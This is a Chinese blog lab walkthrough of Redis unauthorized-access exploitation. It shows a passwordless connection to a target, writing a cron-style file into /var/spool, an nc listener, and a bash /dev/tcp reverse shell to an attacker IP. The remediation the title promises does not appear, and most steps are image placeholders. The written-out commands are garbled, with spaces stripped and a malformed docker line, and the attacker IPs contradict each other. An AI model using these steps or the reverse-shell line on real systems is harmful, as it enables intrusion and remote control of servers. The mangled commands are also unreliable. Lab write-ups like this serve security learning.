redis未授权访问漏洞redis未授权漏洞及整改详细操作Redis未授权访问漏洞




redis未授权访问漏洞redis未授权漏洞及整改详细操作Redis未授权访问漏洞

2022-07-20 21:30:30 网络知识 官方管理员


0x01redis介绍

Redis是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。

话不多说直接开始做实验。

攻击机ip为192.168.31.91

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(1)


Kali为第二台攻击机ip为192.168.31.121

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(2)


靶机ip为192.168.31.176上存在redis未授权访问漏洞,所以可以直接进行无密码连接。

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(3)


Redis的服务已经启动了,端口在6379上。

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(4)

先用第一台攻击机连接靶机Redis-cli–h192.168.31.176

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(5)


往192.168.31.176靶机的/var/spool里写入命令,然后保存名字为root的文件。

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(6)


进入靶机的dockers的里面

dockerexec–it$(dockerps|grep–Eo"[0-9a-zA-Z]"/bin/bash

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(7)

root就是刚刚自己写入的文件!!

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(8)

然后catroot查看一下root文件的内容。

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(9)


由于docker的这个靶机没有crontab这个自动执行的文件,所以我们手动验证一下。

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(10)

Kali用nc-lvvp4444进行监听。

靶机执行/bin/bash-i>&/dev/tcp/192.168.31.131/44440>&1

一执行就连接上了,现在我们在kali里执行一下命令试试看!


你看吧,任意执行shell命令!!

redis未授权访问漏洞(redis未授权漏洞及整改详细操作)(11)


发表评论:

最近发表
网站分类
标签列表